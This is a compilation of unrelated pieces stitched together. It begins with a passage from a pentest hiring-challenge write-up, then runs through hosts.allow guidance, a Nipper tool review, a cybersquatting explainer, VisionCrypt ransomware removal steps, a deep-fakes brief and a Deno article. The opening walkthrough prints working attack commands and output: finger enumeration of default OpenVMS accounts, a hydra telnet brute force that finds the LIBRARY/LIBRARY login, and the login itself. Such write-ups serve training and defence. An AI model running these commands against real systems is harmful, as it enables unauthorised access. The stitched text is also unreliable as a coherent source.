An obvious way was to use Java stored procedures. After one could overcome the limitations of Runtime.exec() (and SQL*Plus…), the system allowed opening connect-back shells without restriction. After a quick look around, the most elegant way to obtain root privileges was to use the beautiful $ORIGIN expansion exploit of Tavis Ormandy (yes, even GCC was installed).
The challenge presented a basic pentest task and required the candidates to follow basic tutorials (if they didn't have enough Oracle-fu in their fingers, for example: http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf). The most time-consuming part was likely installing Oracle Instant Client and configuring Metasploit. Only one participant was able to obtain DBA privileges; no one could execute OS-level commands.
The last target machine was located at 10.10.82.200. First of all, the candidate should have done a port scan:
root@s2crew:~# nmap -sV -v -n -T4 -sC 10.10.82.200
Nmap scan report for 10.10.82.200
Host is up (0.036s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp OpenVMS ftpd 5.1
23/tcp open telnet Pocket CMD telnetd
53/tcp open domain dnsmasq 2.45
| dns-nsid:
|_ bind.version: dnsmasq-2.45
79/tcp open finger OpenVMS fingerd
| finger: Username Program Login Term/Location
|_SYSTEM $ Sun 02:21
110/tcp open pop3
|_pop3-capabilities: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:3E:C1:FC (VMware)
Service Info: Host: vms.silentsignal.hu; OS: OpenVMS; CPE: cpe:/o:hp:openvms
Oh, yes! This is an unbreakable OpenVMS operating system. I think there are only a couple of hackers out there who have remote exploits effective against this target. But a real hacker must solve the problems and discover the weak points of the tested systems and applications. There is a finger service running on the host. Use Google to collect default OpenVMS accounts (http://cd.textfiles.com/group42/PHREAK/XENON/XENON7.HTM). Having that, a simple shell script is enough to check for valid users:
root@s2crew:~# for i in `cat tmp.txt`;do finger $i@10.10.82.200;done
[10.10.82.200]
Username Program Login Term/Location
SYSTEM $ Sun 02:21
Login name: SYSTEM In real life: SYSTEM MANAGER
Account: SYSTEM Directory: SYS$SYSROOT:[SYSMGR]
Last login: Tue 10-DEC-2013 19:17:20
No Plan.
[10.10.82.200]
Login name: FIELD In real life: FIELD SERVICE
Account: FIELD Directory: SYS$SYSROOT:[SYSMAINT]
Last login: [Never logged in]
No Plan.
[10.10.82.200]
Login name: SUPPORT In real life: ???
[10.10.82.200]
Login name: SYSMAINT In real life: ???
[10.10.82.200]
Login name: SYSTEST In real life: SYSTEST-UETP
Account: SYSTEST Directory: SYS$SYSROOT:[SYSTEST]
Last login: [Never logged in]
No Plan.
[10.10.82.200]
Login name: SYSTEST_CLIG In real life: ???
[10.10.82.200]
Login name: DEFAULT In real life: ???
[10.10.82.200]
Login name: DECNET In real life: ???
[10.10.82.200]
Login name: OPERATIONS In real life: ???
[10.10.82.200]
Login name: USER In real life: ???
[10.10.82.200]
Login name: LIBRARY In real life: LIBRARY
Account: LIBRARY Directory: SYS$SYSDEVICE:[LIBRARY]
Last login: Tue 10-DEC-2013 19:49:55
No Plan.
[10.10.82.200]
Login name: GUEST In real life: ???
[10.10.82.200]
Login name: DEMO In real life: DEMO
Account: DEMO Directory: SYS$SYSDEVICE:[DEMO]
Last login: Tue 10-DEC-2013 19:43:11
No Plan.
[10.10.82.200]
Login name: HYTELNET In real life: ???
There are lots of default user accounts in the system.
Let's see the default username/password combinations:
root@s2crew:~# hydra -L tmp.txt -e nsr -p 123456 telnet://10.10.82.200
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2015-03-25 11:14:40
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP or SSH if available
[DATA] 16 tasks, 1 server, 60 login tries (l:15/p:4), ~3 tries per task
[DATA] attacking service telnet on port 23
[STATUS] 37.00 tries/min, 37 tries in 00:01h, 23 todo in 00:01h, 16 active
[telnet] host: 10.10.82.200 login: LIBRARY password: LIBRARY
[STATUS] attack finished for 10.10.82.200 (waiting for children to finish)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-03-25 11:16:19
The candidate could log in to the system with the LIBRARY/LIBRARY account:
root@s2crew:~# telnet 10.10.82.200
Trying 10.10.82.200...
Connected to 10.10.82.200.
Escape character is '^]'.
Welcome to OpenVMS (TM) VAX Operating System, Version V7.3
Username: LIBRARY
Password:
Welcome to OpenVMS (TM) VAX Operating System, Version V7.3
Last interactive login on Tuesday, 10-DEC-2013 20:07
1 failure since last successful login
$
Done! This kind of attack is really old and common; it takes approximately 5 to 10 minutes. We wanted to make sure that the candidate
- was not afraid of exotic or unknown systems,
- knew basic hacking concepts, and
- could use Google.
None of the candidates could solve this task! For the report writing, the candidate should have used a search engine like Google: relevant and good examples could be found on the first page of results for a "penetration testing report" query.
Most people were never heard from again, two guys thanked us for the chance, and a few candidates submitted an actual report. The challenges were simple and common pentesting tasks. Most contestants couldn't think like a professional hacker, but the bigger problem was that they couldn't seem to use Google either. This is really surprising, since some CVs were really impressive, including good research and relevant experience at international security companies. It quickly turned out, though, that a nice reference doesn't replace hands-on experience. Most approached the challenges in a wrong way that suggests a lack of general concepts w.r.t. systems security. For those who want to make a career in penetration testing, we have two suggestions: Try harder and never stop learning! For those who want to hire pentesters: In this profession papers are poor indicators. Real skills show themselves during real exercises. And finally, from our side: We are really, really disappointed :(
The Silent Signal pentest crew
ITS UNIX Systems
Editing hosts.allow and hosts.deny Files
To restrict access to your Unix or Linux machine, you must modify the /etc/hosts.allow and /etc/hosts.deny files. These files are used by the tcpd (TCP wrapper) and sshd programs to decide whether or not to accept a connection coming in from another IP address. ITS recommends that, to start with, you restrict access to only those network addresses you are certain should be allowed access. The following two example files allow connections from any address in the virginia.edu network domain, but no others.
ITS recommends using the configuration shown in the following /etc/hosts.allow file, to permit connections to any services protected by tcpd or sshd from only systems within the virginia.edu domain:
#
# hosts.allow This file describes the names of the hosts which are
# allowed to use the local INET services, as decided
# by the '/usr/sbin/tcpd' server.
#
# Only allow connections within the virginia.edu domain.
ALL: .virginia.edu
Following is ITS's suggested /etc/hosts.deny file content. With this configuration, access to your machine from all hosts is denied, except for those specified in hosts.allow.
#
# hosts.deny This file describes the names of the hosts which are
# *not* allowed to use the local INET services, as decided
# by the '/usr/sbin/tcpd' server.
#
# Deny all by default, only allowing hosts or domains listed in hosts.allow.
ALL: ALL
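To make the matching logic behind these two files concrete, here is a small sketch of the decision order tcpd applies: hosts.allow is consulted first, then hosts.deny, and a connection that matches neither file is accepted. It only models the ALL keyword and the leading-dot domain patterns used above, not the full tcp_wrappers syntax.

# Sketch of the tcpd decision order implemented by the files above.
def suffix_match(host, pattern):
    """'.virginia.edu' matches any host under that domain; 'ALL' matches all."""
    return pattern == "ALL" or (pattern.startswith(".") and host.endswith(pattern))

def tcpd_allows(host, allow_rules, deny_rules):
    if any(suffix_match(host, p) for p in allow_rules):
        return True   # matched in hosts.allow: accept immediately
    if any(suffix_match(host, p) for p in deny_rules):
        return False  # matched in hosts.deny: reject
    return True       # matched in neither file: accept by default

print(tcpd_allows("mail.virginia.edu", [".virginia.edu"], ["ALL"]))  # True
print(tcpd_allows("evil.example.com",  [".virginia.edu"], ["ALL"]))  # False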
Nipper supports a number of popular security devices, including Check Point Software Technologies Ltd.'s Firewall-1, Cisco Systems Inc. routers (IOS), Cisco security appliances, Juniper Networks Inc.'s NetScreen, SonicWall Inc. and others. A Nipper security audit checks configuration settings, password strength, potential problems with protocols and more. The password audit reveals weak passwords or those vulnerable to a dictionary attack, and can export encrypted passwords in a file ready for offline brute-force attack with John the Ripper. The OS check identifies known vulnerabilities, providing CVE references and BugTraq IDs. An ACL audit detects rules that are wide open to the point of being insecure, and spots insecure settings -- such as the failure to authenticate OSPF and RIP updates. Checks are customizable, which allows audits to target specific compliance requirements. Nipper runs on Windows, Mac OS X and Linux at the command line, though there is a rudimentary GUI for using it within Windows. Nipper audits against an exported copy of a router's configuration file, so a router is never touched or changed during the audit. It also supports reporting to HTML, XML, LaTeX and ASCII. Reports note observed findings and potential effects, and provide recommendations in understandable English. The recommendations are helpful for understanding possible weaknesses, but the tool cannot determine whether, say, having IP source routing turned on is necessary for an organization's operations in its environment. In general, Nipper is a good tool for helping organizations keep routers and firewalls configured correctly.
About the author: Scott Sidel is an ISSO with Lockheed Martin.
This was first published in February 2009.
In today's digital age, cybersquatting has become an increasingly prevalent and severe threat. Simply put, cybersquatting refers to the unauthorized use of a domain name with the intention of profiting from someone else's trademark or brand. It involves bad-faith registration, trafficking, or use of a domain name to mislead internet users and profit from the goodwill associated with another's trademark or brand. Cybersquatting can have significant legal and financial consequences, and it is essential to understand this digital threat to protect your online presence. In this section, we will delve into the concept of cybersquatting, its origins, examples of its impact, and the legal implications surrounding it. We will also explore effective practices for preventing cybersquatting and mitigating its risks in e-commerce and social media. Additionally, we will discuss the role of intellectual property rights in combating cybersquatting and the process of domain dispute resolution. By the end of this section, you will have a comprehensive understanding of this digital threat and how to safeguard your digital assets.
The Origins and Evolution of Cybersquatting
Cybersquatting is a relatively new term that emerged in the late 1990s, following the explosion of the internet and the widespread use of domain names. It refers to the registration, trafficking, or use of a domain name with the intent to profit from another party's trademark or brand name. Cybersquatters often register domain names that contain a brand name or a misspelled version of a brand name, in the hope of capitalizing on the traffic generated by the brand's popularity.
The origins of cybersquatting can be traced back to the early days of the internet, when individuals began registering domain names in the hope of reselling them for a profit. However, the practice really took off in the late 1990s, when the popularity of the internet exploded and the registration of domain names became more accessible to the general public. At that time, many well-known brands were slow to recognize the value of their domain names, and as a result, cybersquatters were able to register them for a relatively low cost.
As cybersquatting became more prevalent, trademark owners began to take notice. In response, the United States passed the Anticybersquatting Consumer Protection Act (ACPA) in 1999, which made it illegal to register or use domain names with the intent to profit from another party's trademark or brand name. The ACPA also provided a legal remedy for trademark owners who fell victim to cybersquatting.
Examples of Cybersquatting Incidents
Real-world examples illustrate the various ways in which cybersquatters try to profit from others' trademarks and brand names. Some of the most well-known cases of cybersquatting include:
- Walmart v. Walmartcanada.com: A Canadian individual registered the domain name "Walmartcanada.com" and used it for a website that promoted his own business. Walmart filed a suit against the individual to gain control of the domain, which they won.
- Panavision v. Toeppen: A man named Dennis Toeppen registered the domain name "panavision.com" with the intention of selling it back to the legitimate owner, Panavision. The court found that this constituted bad faith, and Panavision won the case.
- Julia Fiona Roberts v. Russell Boyd: Russell Boyd registered the domain name "Juliaroberts.com" and used it for a website that contained links to pornographic websites. The court ruled in favor of Julia Roberts, who argued that the domain name violated her right to privacy and damaged her reputation.
These examples demonstrate the diverse ways in which cybersquatters seek to profit from others' trademarks and brand names. In each case, the legitimate trademark owner had to take legal action to reclaim the domain name and protect its online presence.
Legal Implications of Cybersquatting
The practice of cybersquatting can have significant legal implications. In many countries, it is considered illegal and infringes on intellectual property rights. Trademark owners have legal recourse to protect themselves against cybersquatters. The primary legal mechanism for combating cybersquatting is the Uniform Domain-Name Dispute-Resolution Policy (UDRP). This policy allows trademark owners to file complaints against the cybersquatter with an approved dispute resolution provider. The UDRP provides a streamlined legal process for resolving domain name disputes, and it has been widely adopted by domain name registrars and intellectual property organizations globally.
The UDRP process involves the following:
- The trademark owner files a complaint with a dispute resolution provider and pays a fee.
- The complaint is reviewed by a UDRP panel, which is composed of independent experts in the field.
- The panel decides whether the domain name is identical or confusingly similar to the trademark, whether the cybersquatter has no legitimate interests in the domain, and whether the cybersquatter registered and used the domain in bad faith.
- If the panel finds in favor of the trademark owner, the domain name is transferred to the trademark owner.
Aside from the UDRP, there are also other legal avenues to address cybersquatting, such as filing a lawsuit against the cybersquatter for trademark infringement or unfair competition. However, these options can be more time-consuming and costly than the UDRP process. It is essential for individuals and businesses to be aware of the legal implications of cybersquatting and take appropriate action to protect their digital assets. Vigilance and timely action are crucial in preventing cybersquatting from causing serious harm to one's brand or reputation.
Preventing Cybersquatting: Best Practices
Preventing cybersquatting is crucial for safeguarding your digital assets. Here are some effective practices to follow:
- Register Your Domain Name: Register your domain name as soon as possible to prevent cybersquatters from taking it.
- Trademark Your Brand: Trademark your brand to establish legal protection and prevent others from using it in bad faith.
- Monitor Your Domain: Monitor your domain name for any unauthorized use or suspicious activity.
- Use Different TLDs: Register your brand's domain name with different TLDs (top-level domains) to prevent cybersquatters from using similar domains.
- Use a Privacy Service: Use a privacy service to shield the personal information associated with your domain registration.
By implementing these best practices, you can diminish the risk of becoming a victim of cybersquatting and protect your online presence.
Cybersquatting: Detecting and Responding to Attempts
As cybersquatting continues to pose a threat to individuals and businesses, it's essential to know how to detect and respond to potential attempts. Here are some strategies:
Monitor domain names
Regular monitoring of domain names similar to your trademark or brand can help detect potential cybersquatting attempts.
Various tools and services are available that can help you keep track of domain registrations that may infringe on your intellectual property rights.
Be vigilant of phishing scams
Cybersquatters often use phishing scams to trick individuals into giving away their login credentials or financial information. Stay aware of any suspicious emails or messages and avoid clicking on links or downloading attachments from unknown senders.
Consider a domain watch service
Domain watch services are designed to monitor domain registrations and alert you to any potential infringements. These services can help you identify and act on cybersquatting attempts quickly.
Take legal action
If you suspect any cybersquatting attempts, it's vital to take legal action. Consult with an experienced lawyer to determine the appropriate course of action, whether it's filing a complaint under the Uniform Domain-Name Dispute-Resolution Policy (UDRP) or pursuing litigation.
Consider defensive registrations
Defensive registrations involve registering domain names that are similar to your trademark or brand to prevent cybersquatters from using them. Although this approach can be costly, it can provide an additional layer of protection.
Cybersquatting vs. Domain Name Hijacking: Understanding the Difference
Cybersquatting and domain name hijacking are two related but distinct practices that can cause significant harm to individuals and businesses. While they share some similarities, it is essential to understand the differences between them and the specific risks associated with each.
Cybersquatting
Cybersquatting, as discussed earlier in this article, refers to the practice of registering, trafficking, or using a domain name with bad-faith intent to profit from the goodwill of someone else's trademark or brand. Cybersquatters often register domain names that are similar or identical to established brand names, with the aim of tricking users into thinking they are visiting the legitimate website. The harms caused by cybersquatting include brand dilution, loss of revenue, reputational damage, and consumer confusion. Many cybersquatters use so-called "typosquatting" techniques, registering domains that contain common misspellings of well-known brand names, further increasing the likelihood of user confusion.
Domain Name Hijacking
In contrast, domain name hijacking refers to the unauthorized transfer of a domain name from its rightful owner to a different registrar or owner. Domain name hijacking can occur through various means, such as social engineering, phishing, or hacking. Domain name hijacking can cause severe damage to individuals and businesses, as the hijacker takes control of the domain and can use it for malicious purposes, such as hosting spam or phishing websites. Additionally, domain name hijacking can result in lost revenue, reputational damage, and the loss of valuable digital assets.
The Importance of Understanding the Difference
While both cybersquatting and domain name hijacking are serious threats, understanding their differences is crucial for effectively combating and addressing them. For instance, the legal remedies available for cybersquatting and domain name hijacking are different, and understanding the distinctions can help determine the appropriate course of action. Additionally, prevention and mitigation strategies for each practice may vary, and individuals and businesses must tailor their efforts accordingly.
By understanding the differences between cybersquatting and domain name hijacking, individuals and businesses can better protect their digital assets and maintain the integrity of their online presence.
The Role of Intellectual Property Rights in Combating Cybersquatting
Intellectual property rights (IPR) play a crucial role in safeguarding digital assets against cybersquatting. IPR laws are designed to protect brand owners from the unauthorized use of their intellectual property, including trademarks, copyrights, and patents. In the context of cybersquatting, IPR laws provide a legal framework for enforcing trademark rights and taking action against cybersquatters.
Trademark owners can rely on several legal remedies to combat cybersquatting. One of the most commonly used mechanisms is the Uniform Domain-Name Dispute-Resolution Policy (UDRP), a process established by the Internet Corporation for Assigned Names and Numbers (ICANN) for resolving domain name disputes. The UDRP provides a streamlined process for trademark owners to recover domain names from cybersquatters.
Other legal options for combating cybersquatting include the Anticybersquatting Consumer Protection Act (ACPA) and the Lanham Act. The ACPA is a federal law that provides additional legal remedies for trademark owners, including the ability to recover damages from cybersquatters. The Lanham Act provides similar protections and allows trademark owners to file lawsuits against cybersquatters in federal court.
Overall, intellectual property rights are an essential tool for combating cybersquatting and protecting digital assets. Businesses and individuals should take proactive measures to secure their intellectual property rights and enforce them against cybersquatters.
Cybersquatting and E-Commerce: Risks and Mitigation Strategies
Cybersquatting poses significant risks for e-commerce businesses, including brand dilution, reputational damage, and financial losses. To safeguard against cybersquatting, businesses can implement the following mitigation strategies:
- Register all relevant domain names: Secure all domain names that are relevant to your business, including variations and common misspellings.
- Monitor domain registrations: Set up alerts to track new domain name registrations that may infringe on your trademarks and intellectual property.
- Take legal action: If you discover that someone has registered or is using a domain name that infringes on your trademarks or intellectual property, take legal action to protect your rights.
In addition to implementing these strategies, e-commerce platforms can take steps to protect their users from cybersquatting, such as:
- Domain verification: Require sellers to verify their domain ownership before listing products on your platform.
- Trademark infringement detection: Use automated monitoring tools to detect and flag potential trademark infringements on your platform.
- Dispute resolution: Provide a clear and transparent process for resolving domain name and trademark disputes on your platform.
By implementing these strategies, e-commerce businesses and platforms can protect themselves and their customers from the risks of cybersquatting.
Cybersquatting and Social Media: Guarding Your Online Presence
Social media platforms have become an integral part of our daily lives, providing us with a platform to connect, share, and engage with people. However, cybersquatters have also recognized the potential of these platforms to profit from others' goodwill and reputation.
In this section, we will explore the potential risks of cybersquatting on social media and provide tips on how to protect your online presence.
The Risks of Cybersquatting on Social Media
Cybersquatting on social media platforms involves creating fake accounts or impersonating individuals or businesses to deceive users into providing personal information or engaging in monetary transactions. These malicious practices can result in financial losses, reputational damage, and legal consequences. Additionally, cybersquatting on social media can lead to brand dilution and confusion among users, ultimately affecting the credibility and authenticity of the affected brand.
Cybersquatters also exploit the popularity of hashtags and keywords related to specific events or products. For instance, during the holiday season, cybersquatters may register domain names and social media handles related to popular gift items and use them to redirect traffic to their own websites or products. This can result in significant financial losses for businesses and individuals who are the rightful owners of the trademarks or products in question.
Protecting Your Online Presence on Social Media
Here are some tips on how to protect your online presence on social media:
- Regularly monitor social media platforms for any impersonation or fake accounts that may pose a risk to your brand or reputation.
- Claim the social media handles and domain names that are associated with your brand or trademark. This will prevent cybersquatters from impersonating or exploiting your brand or product.
- Use strong and unique passwords for all your social media accounts and enable two-factor authentication for added security.
- Ensure that all your social media profiles and pages are verified, providing an extra layer of credibility and authenticity to your brand or product.
- Educate your employees and customers about the potential risks of cybersquatting on social media and how to avoid falling victim to these scams.
By implementing these best practices, individuals and businesses can safeguard their online presence on social media and minimize the risks posed by cybersquatting.
Cybersquatting and Domain Disputes: Understanding the Process
In cases of cybersquatting, domain name disputes can arise between the trademark owner and the alleged infringing party. Domain name disputes are often resolved through arbitration rather than traditional court proceedings. This section will provide an overview of the domain dispute resolution process in cases of cybersquatting.
The Uniform Domain-Name Dispute-Resolution Policy (UDRP)
The Uniform Domain-Name Dispute-Resolution Policy (UDRP) is a widely used mechanism for resolving domain name disputes. Cases under it are administered by approved providers such as the World Intellectual Property Organization (WIPO), and it applies to most top-level domains (TLDs), including .com, .net, and .org. The UDRP is designed to provide a streamlined and cost-effective process for resolving disputes related to domain name registration.
The UDRP process typically involves the following steps:
1. Submitting a complaint: The trademark owner initiates the UDRP process by filing a complaint with an approved dispute resolution provider. The complaint must include a detailed description of the alleged cybersquatting activity and evidence of the trademark owner's rights in the disputed domain name.
2. Notification: Once the complaint is accepted, the dispute resolution provider notifies the alleged cybersquatter of the complaint and provides a deadline for response.
3. Response: The alleged cybersquatter has a limited time to respond to the complaint, providing evidence of rights or legitimate interests in the disputed domain name and refuting the allegations of bad faith.
4. Decision: A panel of independent experts appointed by the dispute resolution provider reviews the evidence presented by both parties and issues a final decision. The decision may result in the transfer or cancellation of the disputed domain name.
The UDRP process typically takes 45-60 days from start to finish and is designed to provide a relatively swift and efficient resolution to domain disputes.
Other Dispute Resolution Mechanisms
In addition to the UDRP, other dispute resolution mechanisms may be available for resolving domain name disputes. These include the Uniform Rapid Suspension System (URS), which provides a faster, less expensive option for trademark owners in cases of clear-cut cybersquatting, and court proceedings, which may be necessary in cases involving complex legal issues or disputes between parties in different jurisdictions. It is essential to understand the options available for resolving domain name disputes and to seek legal advice from a qualified attorney before pursuing any specific course of action.
Frequently Asked Questions (FAQ) about Cybersquatting
In this section, we will answer some common questions about cybersquatting to provide readers with a better understanding of this digital threat.
Q: What is cybersquatting?
A: Cybersquatting refers to the practice of registering, trafficking, or using a domain name with bad-faith intent to profit from the goodwill of someone else's trademark or brand. This involves the unauthorized exploitation of digital assets, leading to significant legal and financial consequences.
Q: How do cybersquatters profit from their actions?
A: Cybersquatters profit from their actions by either selling the domain name to the legitimate trademark owner or by using it to generate revenue through advertising or redirecting traffic to a different website.
Q: Who are the victims of cybersquatting?
A: The victims of cybersquatting are typically businesses or individuals who own trademarked names or brands. However, anyone with an online presence can be a target of cybersquatting.
Q: What are some common examples of cybersquatting?
A: Some common examples of cybersquatting include registering a domain name that is similar to a well-known brand, registering the name of a celebrity or public figure, and registering a domain name that includes a misspelling of a famous brand.
Q: How can I protect my business from cybersquatting?
A: To protect your business from cybersquatting, you can take several measures, such as registering your trademark with the relevant authorities, monitoring the internet for any unauthorized use of your trademark, and taking legal action against any cybersquatters.
Q: What should I do if I am a victim of cybersquatting?
A: If you are a victim of cybersquatting, you should consult with a lawyer who specializes in intellectual property law.
You may be able to file a complaint under the Uniform Domain-Name Dispute-Resolution Policy (UDRP) or take legal action against the cybersquatter.
Q: Can cybersquatting be prevented?
A: While it is impossible to completely prevent cybersquatting, you can take steps to minimize the risk, such as registering your domain name as soon as possible, registering similar domain names and misspellings, and implementing strong trademark protection measures.
Q: How can I learn more about cybersquatting and its implications?
A: There are several resources available online, such as legal websites and intellectual property organizations, that provide extensive information about cybersquatting and its implications. Additionally, consulting with a lawyer who specializes in intellectual property law can provide more in-depth knowledge and guidance.
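As a concrete companion to the monitoring advice given throughout this article, the sketch below generates naive one-edit typo variants of a brand name and reports which resulting .com domains currently resolve in DNS. The brand name is a placeholder, the variant generator is deliberately simplistic, and real monitoring services use far richer variant sets plus WHOIS data.

# Sketch: naive typosquat monitor. Generates simple typo variants of a
# brand name and reports which .com domains currently resolve in DNS.
import socket

def typo_variants(name):
    """Yield naive one-edit typo variants of a bare brand name."""
    for i in range(len(name)):
        yield name[:i] + name[i + 1:]        # missing letter
        yield name[:i] + name[i] + name[i:]  # doubled letter
    for i in range(len(name) - 1):
        swapped = list(name)
        swapped[i], swapped[i + 1] = swapped[i + 1], swapped[i]
        yield "".join(swapped)               # adjacent-letter swap

def resolves(domain):
    """Crude registration check: does the domain resolve? (Registrations
    without DNS records are missed; WHOIS would be more thorough.)"""
    try:
        socket.gethostbyname(domain)
        return True
    except socket.gaierror:
        return False

brand = "example-brand"  # placeholder brand name
for variant in sorted(set(typo_variants(brand)) - {brand}):
    domain = variant + ".com"
    if resolves(domain):
        print("possible typosquat:", domain)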
Ransomware continues to threaten the cyber world, and VisionCrypt Ransomware is another member of this family. This nasty threat was first detected by malware researcher Lawrence Abrams on May 19, 2017. The ransomware got its name from the 'VisionCryptor.exe' file that it drops on the infected system. The purpose of this ransomware is no different from that of its other family members, but its behavior differs slightly. It silently makes its way into the targeted system and immediately starts its encryption process. It instructs the victim to keep the VisionCrypt 2.0 window open on their system if they want to cooperate in decrypting their files. According to infection reports, this file encoder is designed to target English-speaking users, but researchers do not rule out that it can infect computers located in other parts of the world. Researchers suggest removing it with the help of a strong antivirus.
VisionCrypt Ransomware: How Does It Execute Its Purpose?
Just after its invasion, VisionCrypt Ransomware creates entries in the Windows registry that provide it persistence. Such entries help the virus start automatically when the operating system starts. It also deletes the shadow volume copies from Windows, which makes the encryption more damaging by removing the built-in recovery option. The ransomware is designed to encrypt many different file types, such as audio, video, database, picture and document files. To encrypt these data it uses the AES-128 encryption algorithm, and after encryption the files become inaccessible. Users can easily recognize the encrypted files because the ransomware appends the .VisionCrypt extension to each of the affected files. Different antivirus vendors detect the files associated with VisionCrypt Ransomware under different names.
VisionCrypt Ransomware is programmed to collect sensitive information such as the IP address, computer name and system GUID, and to send it to its developer. It also identifies the antivirus running on the system and blocks it so that its malicious process is not interrupted. As mentioned above, it opens a window named VisionCrypt 2.0, which contains the ransom note. The ransom window informs the user what has happened to their files and warns them not to close the window. It also contains a timer that runs a 48-hour countdown. The criminals want the victim to pay a ransom in order to get the private decryption key. According to one report, the crooks want users to pay 25 USD in exchange for the decryptor.
Dealing With VisionCrypt Ransomware
We know that the files stored on your system are important, but it is still not suggested to pay the ransom to criminals. Maybe 25 USD does not seem like a big amount to you, but it is not guaranteed that you will get the private key even after paying. This clearly means that paying the ransom only helps the criminals expand their business. Keeping a backup of important files is always helpful in such a situation because you can easily restore the files without any hassle. You can also use a proper recovery program to get back your files.
Instructions To Remove VisionCrypt Ransomware
Before you restore your files, make sure to remove VisionCrypt Ransomware, otherwise it will invite more dangerous threats. To remove it from your system you can use the following manual removal steps.
Step 1: Remove VisionCrypt Ransomware From Control Panel
- Click on the Start button >> go to Control Panel
- Now select Add/Remove Programs
- Locate VisionCrypt Ransomware among the installed programs
- Finally, select it and uninstall.
Step 2: Remove Suspicious Files From Control Panel
- Close all running programs and open Control Panel.
- Choose the "Uninstall a program" option.
- You will see all the installed programs.
- Find the programs related to VisionCrypt Ransomware.
- Click the Uninstall option to remove them.
Step 3: Remove Ransomware-Related Entries From the Windows Registry
- Press the Windows + R keys together to open the Run box.
- Then type "regedit" to open the Windows Registry Editor.
- Look for entries related to the ransomware.
- Delete the related entries.
If you are still having problems removing the ransomware, don't worry. It is recommended to use a free scanner, which deeply scans the system and removes the threat completely.
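Before restoring from backup, it can also help to inventory exactly which files were encrypted so they can be matched against your backup set. The following small sketch (not an official tool) lists files carrying the .VisionCrypt extension; the starting directory is an example placeholder.

# Sketch: inventory files encrypted by VisionCrypt (".VisionCrypt"
# extension) so they can be matched against backups.
import os

def find_encrypted(root):
    """Yield paths of files whose name ends with the .VisionCrypt extension."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(".VisionCrypt"):
                yield os.path.join(dirpath, name)

if __name__ == "__main__":
    for path in find_encrypted(r"C:\Users"):  # example starting directory
        print(path)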
January 30, 2020
IntelBrief: The Challenge of Deep Fakes
Deep fakes are videos that have been digitally altered or manipulated, typically with the assistance of machine learning tools, to produce human bodies and/or faces that look and sound authentic. As witnessed with comedian Jordan Peele's deep-fake video impersonating President Barack Obama, they can be used for entertainment. Other positive uses include depicting now-deceased actors and actresses in movies as if they were still alive. But there is concern over more sinister or nefarious uses of deep fakes, in which these videos deliberately mislead people into believing an individual said or did something that is entirely fabricated. The implications are dire. Just consider the fallout from a deep fake that depicts a world leader announcing a military strike on an adversarial nation. The threat is compounded when one considers the use of deep fakes in conjunction with other types of attacks, including either kinetic strikes or cyberattacks, and how quickly a deep fake can spread on the internet and through social media platforms.
There are also variants of deep fakes known as 'cheap fakes,' or attempted manipulations done with cheaper software, even including a merely Photoshopped video or image. With the proliferation of social media and more readily accessible software and technologies, there is a range of options available to anyone seeking to experiment with video and image manipulation. Last year, a so-called 'cheap fake' emerged of Speaker of the House Nancy Pelosi. The video was deliberately slowed down to make it appear that Speaker Pelosi was impaired or slurring her words. While it was eventually revealed that the video was doctored, it was still viewed millions of times on social media, disseminated, and discussed widely. Finally, text-based deep-faking, where a user can simply use off-the-shelf software to edit a text transcript by inserting new language or deleting authentic language, has begun a cycle of making deep fakes a household activity.
Deep fakes have become a go-to tool in the growing disinformation portfolios of both nation-states and non-state actors. There are serious implications for dealing with the threat of deep fakes and similar technology. First, the potential threat posed by emerging technologies like deep fakes elevates the importance of diplomacy. One could easily imagine a deep fake video that depicts Kim Jong Un or another world leader threatening an attack. This merely reinforces the necessity of diplomats being able to establish contact with other foreign governments, including adversaries, to verify the authenticity of, or in most cases quickly discredit, deep fake videos designed to inflame tensions. Given the pressure to act and the speed of warfare in the modern era, this means that fake images and videos could have real-world consequences. Second, there is a danger of deep fakes becoming so frequently used that governments and individuals develop an aversion to paying close attention, growing numb from the constant barrage of manipulated videos and images. This could prove problematic the rare time that one of these videos is indeed authentic and authorities prove slow to respond. Third, intelligence analysts and others whose mission it is to analyze data and identify trends will suffer because there is now so much more time and effort required to even verify whether something is real, which leaves less bandwidth for actual analysis.
This is true even despite the development of new tools designed to aid analysts in separating 'signals from noise.' Two states, California and Texas, have tried to curb the proliferation of deep fakes by passing laws banning known deceptive videos intended to influence voting in U.S. elections. Maine has a comparable bill under consideration as well. The federal government, however, has not demonstrated a capacity to tackle the challenge of deep fakes in a bipartisan manner. As such, the proliferation of deep-fake technology will continue to serve as a disinformation force multiplier. While diplomatic and intelligence solutions to hard national security challenges will be key in confronting deep fakes, there is no silver bullet and any solution must be comprehensive. Only when a mix of technological, regulatory, intelligence, diplomatic, and civil society solutions, including one predicated on increasing the media and digital literacy of all strands of society, is deployed will the challenge of deep fakes and its threat to society be partially mitigated.

For tailored research and analysis, please contact: [email protected]
State of the Web: Deno
By Jacob Jackson on January 9, 2022 (Updated July 1, 2023)

In Ryan Dahl's talk 10 Things I Regret About Node.js, he talked about many problems with Node. These issues include Node's failure to embrace web standards, security, Node's way of compiling native modules (GYP), and NPM. Then, he revealed Deno. Deno was a new project that fixed many of the problems Ryan Dahl had mentioned, along with extra advantages like built-in TypeScript support. Ryan Dahl initially built Deno in Go but later switched to Rust. Since Ryan Dahl first announced Deno, it has made significant progress. 1.0 was released in May 2020, and companies like Slack, Netlify, and GitHub have adopted Deno. In addition, the Deno Company has released its own edge serverless function platform, Deno Deploy.

V8 is a sandboxed JavaScript engine, which makes it impossible for code to do anything outside of its boundaries. However, Node.js allows access to things like networking and the filesystem inside the sandbox, which removes the security benefits of V8. Even for trusted programs, this can be harmful, because insecure code or malicious dependencies could deal significant damage and steal information. Deno solves this with a system of permissions. These permissions make you define precisely what the program can do outside of the sandbox, like filesystem access and environment variables. For example, if you wanted to allow reading files within the local assets directory, you would run Deno with a command like:

deno run --allow-read=./assets

Because of these capabilities, you can ensure that your code does not reach outside of its boundaries, increasing security.

